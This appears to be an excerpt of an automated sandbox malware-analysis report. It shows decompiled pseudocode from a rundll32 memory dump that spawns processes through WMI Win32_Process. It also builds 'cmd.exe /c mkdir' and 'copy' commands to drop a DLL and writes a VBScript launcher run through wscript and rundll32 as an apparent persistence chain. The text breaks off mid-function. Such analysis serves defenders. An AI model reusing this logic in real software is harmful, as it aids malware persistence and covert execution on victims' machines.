                0x215205cb71f
                0x215205cb727
                0x215205cb72b
                0x215205cb72e
                0x215205cb735
                0x215205cb73a
                0x215205cb73f
                0x215205cb74c
                0x215205cb755
                0x215205cb75e
                0x215205cb769
                0x215205cb776
                0x215205cb77e
                0x215205cb786
                0x215205cb78d
                0x215205cb78f
                0x215205cb793
                0x215205cb79a
                0x215205cb79d
                0x215205cb7a2
                0x215205cb7a5
                0x215205cb7a7
                0x215205cb7aa
                0x215205cb7b1
                0x215205cb7b8
                0x215205cb7be
                0x215205cb7c1
                0x215205cb7c7
                0x215205cb7cf
                0x215205cb7d7
                0x215205cb7d9
                0x215205cb7df
                0x215205cb7e9
                0x215205cb7eb
                0x215205cb7f0
                0x215205cb7fc
                0x215205cb801
                0x215205cb80a
                0x215205cb812
                0x215205cb819
                0x215205cb81b
                0x215205cb81f
                0x215205cb82d
                0x215205cb833
                0x215205cb839
                0x215205cb840
                0x215205cb845
                0x215205cb846
                0x215205cb849
                0x215205cb850
                0x215205cb857
                0x215205cb865
                0x215205cb86d
                0x215205cb873
                0x215205cb877
                0x215205cb87f
                0x215205cb887
                0x215205cb889
                0x215205cb88f
                0x215205cb899
                0x215205cb89b
                0x215205cb8a0
                0x215205cb8ac
                0x215205cb8b1
                0x215205cb8b9
                0x215205cb8c4
                0x215205cb8c8
                0x215205cb8d3
                0x215205cb8db
                0x215205cb8e5
                0x215205cb8ec
                0x215205cb8f7
                0x215205cb8fb
                0x215205cb907
                0x215205cb90f
                0x215205cb919
                0x215205cb920
                0x215205cb92b
                0x215205cb934
                0x215205cb940
                0x215205cb948
                0x215205cb952
                0x215205cb955
                0x215205cb964
                0x215205cb96e
                0x215205cb973
                0x215205cb978
                0x215205cb97d
                0x215205cb982
                0x215205cb994
                0x215205cb99a
                0x215205cb9a4
                0x215205cb9ac
                0x215205cb9b3
                0x215205cb9b5
                0x215205cb9b9
                0x215205cb9c7
                0x215205cb9cd
                0x215205cb9d3
                0x215205cb9da
                0x215205cb9df
                0x215205cb9e0
                0x215205cb9e3
                0x215205cb9ea
                0x215205cb9f1
                0x215205cb9fc
                0x215205cb9ff
                0x215205cba04
                0x215205cba0d
                0x215205cba1b
                0x215205cba25
                0x215205cba2d
                0x215205cba34
                0x215205cba36
                0x215205cba3a
                0x215205cba48
                0x215205cba4e
                0x215205cba54
                0x215205cba5b
                0x215205cba60
                0x215205cba61
                0x215205cba64
                0x215205cba6b
                0x215205cba72
                0x215205cba80
                0x215205cba85
                0x215205cba8e
                0x215205cba9c
                0x215205cbaa9
                0x215205cbab3
                0x215205cbabd
                0x215205cbac7
                0x215205cbad1
                0x215205cbadb
                0x215205cbae4
                0x215205cbaed
                0x215205cbaf6
                0x215205cbb04
                0x215205cbb0f
                0x215205cbb1a
                0x215205cbb24
                0x215205cbb2f
                0x215205cbb3c
                0x215205cbb4f
                0x215205cbb70

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$Variant$_com_issue_error$AllocClear$Free$Init$AddressConvertCreateHandleInstanceModuleProc_com_util::
                • String ID: CoSetProxyBlanket$CommandLine$Create$CreateFlags$ProcessId$ProcessStartupInformation$ROOT\CIMV2$ReturnValue$ShowWindow$Win32_Process$Win32_ProcessStartup$ole32.dll
                • API String ID: 3900671881-2140978212
                • Opcode ID: 577be674044115fc2f78a0cf5240f538573a94ace5507aee088b599f99c6a764
                • Instruction ID: de2445feda598677191f082db2757ba059f89a862263e365d350031ebb43f050
                • Opcode Fuzzy Hash: 577be674044115fc2f78a0cf5240f538573a94ace5507aee088b599f99c6a764
                • Instruction Fuzzy Hash: 60122337202F60C6EB208F65E89869D77B0FB98BA8F544565DE4E47B68DF38C558C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205CC180 Relevance: 59.8, APIs: 25, Strings: 9, Instructions: 342memorycomCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 22%
                			E00000215215205CC180(void* __eax, void* __esi, long long __rcx, long long __rdx) {
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				long long* _t227;
				long long* _t234;
				long long* _t235;
				long long _t245;
				intOrPtr* _t250;
				intOrPtr* _t252;
				void* _t308;
				intOrPtr* _t310;
				long long _t312;
				long long _t314;
				signed long long _t316;
				void* _t319;
				short* _t320;
				void* _t322;
				void* _t323;
				void* _t341;
				void* _t344;
				void* _t347;
				void* _t351;

				 *((long long*)(_t322 + 0x10)) = __rdx;
				 *((long long*)(_t322 + 8)) = __rcx;
				_t320 = _t322 - 0x38;
				_t323 = _t322 - 0x138;
				 *((long long*)(_t320 - 0x10)) = 0xfffffffe;
				 *((long long*)(_t320 + 0x98)) = _t245;
				 *((long long*)(_t320 + 0x80)) = _t245;
				 *((long long*)(_t323 + 0x20)) = _t320 + 0x98;
				_t9 = _t245 + 1; // 0x1
				r8d = _t9;
				__imp__CoCreateInstance(_t344, _t341, _t308, _t316, _t245, _t319);
				if (__eax < 0) goto 0x205cc233;
				 *((long long*)(_t323 + 0x40)) = _t320 + 0x80;
				 *((long long*)(_t323 + 0x38)) = _t245;
				 *((long long*)(_t323 + 0x30)) = _t245;
				 *((intOrPtr*)(_t323 + 0x28)) = 0;
				 *((long long*)(_t323 + 0x20)) = _t245;
				r9d = 0;
				r8d = 0;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x98)))) + 0x18))() >= 0) goto 0x205cc23a;
				_t250 =  *((intOrPtr*)(_t320 + 0x98));
				if (_t250 == 0) goto 0x205cc233;
				 *((intOrPtr*)( *_t250 + 0x10))();
				goto 0x205cc6df;
				 *((intOrPtr*)(_t323 + 0x38)) = 0;
				 *((long long*)(_t323 + 0x30)) = _t245;
				 *((intOrPtr*)(_t323 + 0x28)) = 3;
				 *((intOrPtr*)(_t323 + 0x20)) = 3;
				r9d = 0;
				r8d = 0;
				__imp__CoSetProxyBlanket();
				if (3 >= 0) goto 0x205cc285;
				_t252 =  *((intOrPtr*)(_t320 + 0x98));
				if (_t252 == 0) goto 0x205cc27c;
				 *((intOrPtr*)( *_t252 + 0x10))();
				goto 0x205cc228;
				__imp__#2();
				__imp__#2();
				__imp__#2();
				 *((long long*)(_t323 + 0x60)) = _t245;
				 *((long long*)(_t323 + 0x28)) = _t245;
				 *((long long*)(_t323 + 0x20)) = _t323 + 0x60;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x80)))) + 0x30))();
				 *((long long*)(_t323 + 0x68)) = _t245;
				 *((long long*)(_t323 + 0x28)) = _t245;
				 *((long long*)(_t323 + 0x20)) = _t323 + 0x68;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x80)))) + 0x30))();
				 *((long long*)(_t323 + 0x50)) = _t245;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x68)))) + 0x78))();
				 *((long long*)(_t323 + 0x70)) = _t245;
				 *((long long*)(_t323 + 0x20)) = _t245;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x60)))) + 0x98))();
				 *((long long*)(_t320 + 0x90)) = _t245;
				_t227 =  *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x70))));
				 *((intOrPtr*)(_t227 + 0x78))();
				 *((long long*)(_t320 - 0x78)) = _t245;
				 *((long long*)(_t320 - 0x70)) = _t245;
				 *((long long*)(_t320 - 0x70)) = 0xf;
				 *((long long*)(_t320 - 0x78)) = _t245;
				 *((char*)(_t323 + 0x78)) = 0;
				if ( *0x206830b0 != 0) goto 0x205cc391;
				goto 0x205cc39e;
				if ( *((char*)(0x206830b0 + (_t316 | 0xffffffff) + 1)) != 0) goto 0x205cc394;
				E0000021521520588C10(_t245, _t323 + 0x78, 0x206830b0, _t308, _t320, (_t316 | 0xffffffff) + 1);
				 *((short*)(_t320 - 0x58)) = 8;
				_t349 =  >=  ?  *((void*)(_t323 + 0x78)) : _t323 + 0x78;
				E00000215215205F4DCC(_t227, _t323 + 0x78);
				 *((long long*)(_t320 + 0x88)) = _t227;
				if (_t227 == 0) goto 0x205cc3f0;
				 *((long long*)(_t227 + 8)) = _t245;
				 *((intOrPtr*)(_t227 + 0x10)) = 1;
				_t263 =  >=  ?  *((void*)(_t323 + 0x78)) : _t323 + 0x78;
				E00000215215205F6FA0(0, _t245,  >=  ?  *((void*)(_t323 + 0x78)) : _t323 + 0x78, _t316 | 0xffffffff);
				 *_t227 = _t227;
				goto 0x205cc3f3;
				_t310 = _t245;
				 *((long long*)(_t320 + 0x88)) = _t310;
				if (_t310 != 0) goto 0x205cc40a;
				E00000215215205F6F70();
				 *((long long*)(_t320 - 0x50)) =  *_t310;
				asm("lock xadd [edi+0x10], esi");
				if (__esi != 1) goto 0x205cc44b;
				if ( *_t310 == 0) goto 0x205cc42c;
				__imp__#6();
				 *_t310 = _t245;
				if ( *((intOrPtr*)(_t310 + 8)) == 0) goto 0x205cc43e;
				E00000215215205F51EC( *_t310, _t245, _t316 | 0xffffffff, _t351);
				 *((long long*)(_t310 + 8)) = _t245;
				E00000215215205F51EC( *_t310, _t245, _t316 | 0xffffffff, _t347);
				 *((long long*)(_t320 + 0x88)) = _t245;
				 *((intOrPtr*)(_t323 + 0x20)) = 0;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x90)))) + 0x28))();
				 *((short*)(_t320 - 0x28)) = 3;
				 *((intOrPtr*)(_t320 - 0x20)) = 4;
				 *((intOrPtr*)(_t323 + 0x20)) = 0;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x50)))) + 0x28))();
				 *((short*)(_t320 - 0x40)) = 0xd;
				 *((long long*)(_t320 - 0x38)) =  *((intOrPtr*)(_t323 + 0x50));
				 *((intOrPtr*)(_t323 + 0x20)) = 0;
				r8d = 0;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x90)))) + 0x28))();
				 *((long long*)(_t323 + 0x58)) = _t245;
				 *((long long*)(_t323 + 0x38)) = _t245;
				 *((long long*)(_t323 + 0x30)) = _t323 + 0x58;
				_t234 =  *((intOrPtr*)(_t320 + 0x90));
				 *((long long*)(_t323 + 0x28)) = _t234;
				 *((long long*)(_t323 + 0x20)) = _t245;
				r9d = 0;
				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x80)))) + 0xc0))() >= 0) goto 0x205cc52f;
				__imp__#9();
				__imp__#9();
				goto 0x205cc653;
				E00000215215205F4DCC(_t234, _t320 - 0x28);
				 *((long long*)(_t320 + 0x88)) = _t234;
				if (_t234 == 0) goto 0x205cc573;
				 *((long long*)(_t234 + 8)) = _t245;
				 *((intOrPtr*)(_t234 + 0x10)) = 1;
				__imp__#2();
				 *_t234 = _t234;
				if (_t234 != 0) goto 0x205cc576;
				E00000215215205F6F70();
				asm("int3");
				_t312 = _t245;
				 *((long long*)(_t320 - 0x68)) = _t312;
				if (_t312 != 0) goto 0x205cc58a;
				E00000215215205F6F70();
				_t235 =  *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x58))));
				 *((long long*)(_t323 + 0x28)) = _t245;
				 *((long long*)(_t323 + 0x20)) = _t245;
				r8d = 0;
				E00000215215205C51F0( *((intOrPtr*)(_t235 + 0x20))(), _t245, _t320 - 0x68);
				E00000215215205F4DCC(_t235, _t320 - 0x68);
				 *((long long*)(_t320 + 0x88)) = _t235;
				if (_t235 == 0) goto 0x205cc5f7;
				 *((long long*)(_t235 + 8)) = _t245;
				 *((intOrPtr*)(_t235 + 0x10)) = 1;
				__imp__#2();
				 *_t235 = _t235;
				if (_t235 != 0) goto 0x205cc5fa;
				E00000215215205F6F70();
				asm("int3");
				_t314 = _t245;
				 *((long long*)(_t320 - 0x60)) = _t314;
				if (_t314 != 0) goto 0x205cc60e;
				E00000215215205F6F70();
				 *((long long*)(_t323 + 0x28)) = _t245;
				 *((long long*)(_t323 + 0x20)) = _t245;
				r8d = 0;
				E00000215215205C51F0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x58)))) + 0x20))(), _t245, _t320 - 0x60);
				__imp__#9();
				__imp__#9();
				__imp__#9();
				__imp__#6();
				__imp__#6();
				__imp__#6();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x60)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x68)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x50)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x90)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x70)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t323 + 0x58)))) + 0x10))();
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x80)))) + 0x10))();
				E0000021521520586820( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x98)))) + 0x10))(), 0x8007000e, _t323 + 0x78);
				return  *_t320;
			}


























                0x215205cc180
                0x215205cc185
                0x215205cc196
                0x215205cc19b
                0x215205cc1a2
                0x215205cc1ac
                0x215205cc1b3
                0x215205cc1c1
                0x215205cc1cf
                0x215205cc1cf
                0x215205cc1da
                0x215205cc1e2
                0x215205cc1f5
                0x215205cc1fa
                0x215205cc1ff
                0x215205cc204
                0x215205cc208
                0x215205cc20d
                0x215205cc210
                0x215205cc21f
                0x215205cc221
                0x215205cc22b
                0x215205cc230
                0x215205cc235
                0x215205cc23a
                0x215205cc23e
                0x215205cc248
                0x215205cc24c
                0x215205cc250
                0x215205cc253
                0x215205cc260
                0x215205cc268
                0x215205cc26a
                0x215205cc274
                0x215205cc279
                0x215205cc283
                0x215205cc28c
                0x215205cc29c
                0x215205cc2ac
                0x215205cc2b5
                0x215205cc2c4
                0x215205cc2ce
                0x215205cc2d3
                0x215205cc2d6
                0x215205cc2dc
                0x215205cc2e0
                0x215205cc2ef
                0x215205cc2f9
                0x215205cc2fe
                0x215205cc301
                0x215205cc307
                0x215205cc30b
                0x215205cc31f
                0x215205cc322
                0x215205cc32f
                0x215205cc339
                0x215205cc33f
                0x215205cc345
                0x215205cc351
                0x215205cc35d
                0x215205cc360
                0x215205cc364
                0x215205cc368
                0x215205cc370
                0x215205cc374
                0x215205cc38a
                0x215205cc38f
                0x215205cc39c
                0x215205cc3a3
                0x215205cc3ad
                0x215205cc3bb
                0x215205cc3c4
                0x215205cc3cc
                0x215205cc3d6
                0x215205cc3d8
                0x215205cc3dc
                0x215205cc3e3
                0x215205cc3e6
                0x215205cc3eb
                0x215205cc3ee
                0x215205cc3f0
                0x215205cc3f3
                0x215205cc3fd
                0x215205cc404
                0x215205cc40d
                0x215205cc411
                0x215205cc419
                0x215205cc421
                0x215205cc423
                0x215205cc429
                0x215205cc433
                0x215205cc435
                0x215205cc43a
                0x215205cc446
                0x215205cc44b
                0x215205cc45c
                0x215205cc464
                0x215205cc46e
                0x215205cc476
                0x215205cc47a
                0x215205cc489
                0x215205cc491
                0x215205cc49b
                0x215205cc4a3
                0x215205cc4ac
                0x215205cc4ba
                0x215205cc4c2
                0x215205cc4cc
                0x215205cc4cf
                0x215205cc4de
                0x215205cc4e8
                0x215205cc4ed
                0x215205cc4f4
                0x215205cc4f9
                0x215205cc4fe
                0x215205cc510
                0x215205cc516
                0x215205cc520
                0x215205cc52a
                0x215205cc534
                0x215205cc53c
                0x215205cc546
                0x215205cc548
                0x215205cc54c
                0x215205cc55a
                0x215205cc560
                0x215205cc566
                0x215205cc56d
                0x215205cc572
                0x215205cc573
                0x215205cc576
                0x215205cc57d
                0x215205cc584
                0x215205cc58f
                0x215205cc592
                0x215205cc597
                0x215205cc5a0
                0x215205cc5ae
                0x215205cc5b8
                0x215205cc5c0
                0x215205cc5ca
                0x215205cc5cc
                0x215205cc5d0
                0x215205cc5de
                0x215205cc5e4
                0x215205cc5ea
                0x215205cc5f1
                0x215205cc5f6
                0x215205cc5f7
                0x215205cc5fa
                0x215205cc601
                0x215205cc608
                0x215205cc616
                0x215205cc61b
                0x215205cc624
                0x215205cc632
                0x215205cc63f
                0x215205cc649
                0x215205cc653
                0x215205cc65c
                0x215205cc665
                0x215205cc66e
                0x215205cc67c
                0x215205cc687
                0x215205cc692
                0x215205cc69f
                0x215205cc6aa
                0x215205cc6b5
                0x215205cc6c2
                0x215205cc6d8
                0x215205cc6f2

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: String$AllocClearVariant_com_issue_error$Free$BlanketConvertCreateInstanceProxy_com_util::
                • String ID: CommandLine$Create$CreateFlags$ProcessId$ProcessStartupInformation$ROOT\CIMV2$ReturnValue$Win32_Process$Win32_ProcessStartup
                • API String ID: 3916112548-2022159726
                • Opcode ID: 5a087bbaaa817a8b4bb644c11bc11c303b2db18c28a5b500b6b8c2941372f159
                • Instruction ID: 93204e2633125873ee2d3148e9cab823a9c718d21d5b253ef7fcf29073fe3d17
                • Opcode Fuzzy Hash: 5a087bbaaa817a8b4bb644c11bc11c303b2db18c28a5b500b6b8c2941372f159
                • Instruction Fuzzy Hash: F6F11737206F90C6EB208F65E89879D77A0FB98BA8F544565DE8D87B68DF38C548C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0000021520587ED0 Relevance: 26.7, APIs: 5, Strings: 10, Instructions: 473COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 26%
                			E0000021521520587ED0(signed char __ebx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, signed long long __r9, signed int __r12) {
				void* __rbp;
				void* __r14;
				void* __r15;
				void* _t179;
				signed char _t184;
				void* _t188;
				void* _t189;
				void* _t203;
				void* _t219;
				void* _t221;
				void* _t222;
				int _t228;
				signed char _t237;
				signed char _t241;
				signed char _t250;
				void* _t252;
				void* _t254;
				void* _t298;
				intOrPtr _t299;
				intOrPtr _t301;
				intOrPtr* _t302;
				intOrPtr* _t304;
				intOrPtr* _t305;
				intOrPtr _t306;
				intOrPtr _t307;
				intOrPtr _t309;
				intOrPtr _t312;
				char* _t314;
				void* _t315;
				intOrPtr _t323;
				void* _t324;
				void* _t328;
				signed int _t372;
				intOrPtr _t381;
				void* _t382;
				void* _t425;
				void* _t430;
				void* _t432;
				void* _t433;
				void* _t434;
				signed long long _t458;
				signed long long _t459;
				signed long long _t460;
				void* _t469;
				signed int _t471;
				void* _t473;
				signed long long _t474;
				void* _t475;

				_t471 = __r12;
				_t458 = __r9;
				_t237 = __ebx;
				_t298 = _t433;
				_t432 = _t298 - 0x4d8;
				_t434 = _t433 - 0x5c0;
				 *((long long*)(_t432 + 0xa8)) = 0xfffffffe;
				 *((long long*)(_t298 + 8)) = __rbx;
				 *((long long*)(_t298 + 0x10)) = __rsi;
				 *((long long*)(_t298 + 0x18)) = __rdi;
				 *((long long*)(_t298 + 0x20)) = __r12;
				_t474 = __r9;
				_t425 = __r8;
				_t475 = __rdx;
				_t430 = __rcx;
				asm("xorps xmm0, xmm0");
				asm("movdqu [ebp+0x30], xmm0");
				r12d = 0;
				 *(_t432 + 0x40) = __r12;
				 *((intOrPtr*)(_t434 + 0x40)) = r12b;
				_t179 = E0000021521520588660(__rbx, _t432 + 0x30, _t434 + 0x40);
				r9d = 0;
				_t11 = _t471 + 0x23; // 0x23
				r8d = _t11;
				_t314 =  *((intOrPtr*)(_t432 + 0x30));
				__imp__SHGetSpecialFolderPathA();
				if (_t179 != 0) goto 0x20587f52;
				goto 0x205885cf;
				 *(_t434 + 0x78) = __r12;
				 *((long long*)(_t432 - 0x80)) = __r12;
				 *((long long*)(_t432 - 0x80)) = 0xf;
				 *(_t434 + 0x78) = __r12;
				 *((char*)(_t434 + 0x68)) = 0;
				if ( *_t314 != 0) goto 0x20587f77;
				goto 0x20587f8a;
				if ( *((char*)(_t314 + (__r12 | 0xffffffff) + 1)) != 0) goto 0x20587f80;
				E0000021521520586B10(_t314, _t434 + 0x68, _t314, __rcx, (__r12 | 0xffffffff) + 1);
				if ( *(_t434 + 0x78) != 0) goto 0x20587faa;
				goto 0x20588566;
				E00000215215205893D0(_t314, _t434 + 0x48, "\\", _t430, _t432, _t430, _t458);
				_t459 = _t458 | 0xffffffff;
				r8d = r8d ^ r8d;
				E0000021521520588D60(_t314, _t434 + 0x68, _t298, _t425, _t430, _t432, _t430, _t459);
				_t299 =  *((intOrPtr*)(_t434 + 0x60));
				if (_t299 - 0x10 < 0) goto 0x2058802c;
				_t323 =  *((intOrPtr*)(_t434 + 0x48));
				if (_t299 + 1 - 0x1000 < 0) goto 0x20588027;
				if (0 == 0) goto 0x20587ffa;
				0x205faadc();
				asm("int3");
				_t301 =  *((intOrPtr*)(_t323 - 8));
				if (_t301 - _t323 < 0) goto 0x20588009;
				0x205faadc();
				asm("int3");
				_t324 = _t323 - _t301;
				if (_t324 - 8 >= 0) goto 0x20588018;
				0x205faadc();
				asm("int3");
				if (_t324 - 0x27 <= 0) goto 0x20588024;
				0x205faadc();
				asm("int3");
				0x205f51e4();
				 *((long long*)(_t434 + 0x60)) = 0xf;
				 *((long long*)(_t434 + 0x58)) = __r12;
				 *((char*)(_t434 + 0x48)) = 0;
				_t302 = _t434 + 0x68;
				if (_t425 == _t302) goto 0x2058805d;
				_t460 = _t459 | 0xffffffff;
				r8d = 0;
				E0000021521520586C40(_t314, _t425, _t434 + 0x68, _t425, _t430, _t430, _t460);
				if ( *((char*)(_t432 + 0x500)) == 0) goto 0x20588070;
				goto 0x20588566;
				_t328 =  >=  ?  *((void*)(_t434 + 0x68)) : _t434 + 0x68;
				_t184 = GetFileAttributesA(??);
				if (_t184 == 0xffffffff) goto 0x20588097;
				if ((_t184 & 0x00000010) == 0) goto 0x20588097;
				goto 0x20588566;
				 *((long long*)(_t432 + 0x20)) = __r12;
				 *((long long*)(_t432 + 0x28)) = __r12;
				 *((long long*)(_t432 + 0x28)) = 0xf;
				 *((long long*)(_t432 + 0x20)) = __r12;
				 *((char*)(_t432 + 0x10)) = 0;
				r8d = 7;
				E0000021521520586B10(_t314, _t432 + 0x10, "\"mkdir ", _t430, _t430);
				_t461 = _t460 | 0xffffffff;
				r8d = r8d ^ r8d;
				E0000021521520588D60(_t314, _t432 + 0x10, _t425, _t425, _t430, _t432, _t430, _t460 | 0xffffffff);
				r8d = 1;
				E0000021521520588C10(_t314, _t432 + 0x10, "\"", _t425, _t432, _t430);
				_t188 = E00000215215205893D0(_t314, _t434 + 0x48, "cmd.exe /c ", _t430, _t432, _t432 + 0x10, _t460 | 0xffffffff);
				if ( *((long long*)(_t302 + 0x18)) - 0x10 < 0) goto 0x20588111;
				_t189 = E00000215215205CB510(_t188, _t252, _t314,  *_t302, "cmd.exe /c ");
				E0000021521520586820(_t189, 0, _t434 + 0x48);
				if (_t189 == 0) goto 0x20588130;
				0x20587e80();
				E0000021521520589490(_t314, _t434 + 0x48, _t434 + 0x68, _t430, _t432, "\\", _t461);
				E0000021521520586820(E00000215215205895D0(_t432 + 0x88,  *_t302, _t425, _t430, _t432, _t475, _t461), _t189, _t434 + 0x48);
				r8d = 4;
				E0000021521520588C10(_t314, _t432 + 0x88, ".dll", _t425, _t432, _t475);
				 *((long long*)(_t432 + 0x58)) = __r12;
				 *((long long*)(_t432 + 0x60)) = __r12;
				 *((long long*)(_t432 + 0x60)) = 0xf;
				 *((long long*)(_t432 + 0x58)) = __r12;
				 *((char*)(_t432 + 0x48)) = 0;
				if ( *((long long*)(_t474 + 0x10)) != 0) goto 0x205881c7;
				r8d = 0x208;
				E00000215215205F8EF0(_t189, 0, 1, _t254, _t432 + 0x2b0, ".dll", _t425, _t475);
				r8d = 0x208;
				GetModuleFileNameA(??, ??, ??);
				goto 0x205881e3;
				_t304 = _t432 + 0x48;
				if (_t304 == _t474) goto 0x205881e3;
				r8d = 0;
				E0000021521520586C40(_t314, _t432 + 0x48, _t474, _t425, _t430, _t475, _t461 | 0xffffffff);
				 *((long long*)(_t432 - 0x20)) = __r12;
				 *((long long*)(_t432 - 0x18)) = __r12;
				 *((long long*)(_t432 - 0x18)) = 0xf;
				 *((long long*)(_t432 - 0x20)) = __r12;
				 *((char*)(_t432 - 0x30)) = 0;
				r8d = 6;
				E0000021521520586B10(_t314, _t432 - 0x30, "\"copy ", _t430, _t475);
				r8d = r8d ^ r8d;
				E0000021521520588D60(_t314, _t432 - 0x30, _t432 + 0x48, _t425, _t430, _t432, _t475, _t461 | 0xffffffffffffffff);
				E0000021521520588C10(_t314, _t432 - 0x30, " ", _t425, _t432, _t425);
				r8d = 0;
				E0000021521520588D60(_t314, _t432 - 0x30, _t432 + 0x88, _t425, _t430, _t432, _t425, _t461 | 0xffffffffffffffff);
				E0000021521520588C10(_t314, _t432 - 0x30, "\"", _t425, _t432, _t425);
				_t203 = E00000215215205893D0(_t314, _t434 + 0x48, "cmd.exe /c ", _t430, _t432, _t432 - 0x30, _t461 | 0xffffffffffffffff);
				if ( *((long long*)(_t304 + 0x18)) - 0x10 < 0) goto 0x20588283;
				_t305 =  *_t304;
				_t250 = E00000215215205CB510(_t203, _t189, _t314, _t305, "cmd.exe /c ");
				E0000021521520586820(_t204, 0, _t434 + 0x48);
				if (_t250 == 0) goto 0x205882a2;
				_t241 = _t250;
				0x20587e80();
				r8d = 0x200;
				E00000215215205F8EF0(_t241, 0, _t250, _t254, _t432 + 0xb0, "cmd.exe /c ", _t425, _t432 - 0x30);
				 *((intOrPtr*)(_t432 - 0x58)) = 0x100;
				GetUserNameW(??, ??);
				E0000021521520589490(_t314, _t432 + 0x68, _t434 + 0x68, _t430, _t432, "\\", _t461 | 0xffffffffffffffff);
				E00000215215205895D0(_t432 - 0x78, _t305, _t425, _t430, _t432, _t475, _t461 | 0xffffffffffffffff);
				E0000021521520586820(E0000021521520586820(E0000021521520589550(_t432 - 0x10, _t305, _t425, _t432, ".mbx"), _t241, _t432 - 0x78), _t241, _t432 + 0x68);
				 *((long long*)(_t434 + 0x58)) = __r12;
				 *((long long*)(_t434 + 0x60)) = __r12;
				 *((long long*)(_t434 + 0x60)) = 7;
				 *((long long*)(_t434 + 0x58)) = __r12;
				 *((intOrPtr*)(_t434 + 0x48)) = r12w;
				r8d = 0xb;
				E0000021521520588AC0(_t314, _t434 + 0x48, L"wscript.exe", _t430, ".mbx");
				E00000215215205893D0(_t314, _t432 + 0x68, "/E:vbscript ", _t430, _t432, _t432 - 0x10, _t461 | 0xffffffffffffffff);
				if ( *((long long*)(_t305 + 0x18)) - 0x10 < 0) goto 0x20588370;
				_t306 =  *_t305;
				 *((long long*)(_t434 + 0x30)) = _t434 + 0x48;
				E0000021521520586820(E00000215215205C6780(_t237, _t241, _t189, _t314, "/E:vbscript ", _t425, _t430, _t432 + 0xb0, _t306, _t469, _t474), _t241, _t432 + 0x68);
				if ( *((intOrPtr*)(_t434 + 0x60)) - 8 < 0) goto 0x205883b1;
				E0000021521520588F90(0, _t314,  *((intOrPtr*)(_t434 + 0x48)), _t425, _t430,  *((intOrPtr*)(_t434 + 0x60)) + 1, _t306);
				 *((long long*)(_t434 + 0x60)) = 7;
				 *((long long*)(_t434 + 0x58)) = __r12;
				 *((intOrPtr*)(_t434 + 0x48)) = r12w;
				 *(_t432 - 0x40) = __r12;
				 *((long long*)(_t432 - 0x38)) = __r12;
				 *((long long*)(_t432 - 0x38)) = 0xf;
				 *(_t432 - 0x40) = __r12;
				 *((char*)(_t432 - 0x50)) = 0;
				r8d = 0x6b;
				E0000021521520586B10(_t314, _t432 - 0x50, "Set objShell = CreateObject(\"Wscript.Shell\")\r\nobjShell.Run \"rundll32.exe my_application_path, LLBMPMUsqf\"\r\n", _t430,  *((intOrPtr*)(_t434 + 0x60)) + 1);
				 *((long long*)(_t432 - 0x68)) = __r12;
				 *((long long*)(_t432 - 0x60)) = __r12;
				 *((long long*)(_t432 - 0x60)) = 0xf;
				 *((long long*)(_t432 - 0x68)) = __r12;
				 *((char*)(_t432 - 0x78)) = 0;
				r8d = 0x13;
				_t219 = E0000021521520586B10(_t314, _t432 - 0x78, "my_application_path", _t430,  *((intOrPtr*)(_t434 + 0x60)) + 1);
				_t416 =  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78;
				r8d = 0;
				E0000021521520586A20(_t219, _t432 - 0x50,  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78,  *((intOrPtr*)(_t434 + 0x60)) + 1,  *((intOrPtr*)(_t432 - 0x68)));
				if (_t306 == 0xffffffff) goto 0x2058849d;
				asm("o16 nop [eax+eax]");
				 *((long long*)(_t434 + 0x28)) = 0xffffffff;
				 *((long long*)(_t434 + 0x20)) = __r12;
				_t221 = E0000021521520589920(_t432 - 0x50, _t306, _t306,  *((intOrPtr*)(_t432 - 0x68)), _t432 + 0x88, __r12, _t473, _t475);
				_t419 =  >=  ?  *((void*)(_t432 - 0x78)) : _t432 - 0x78;
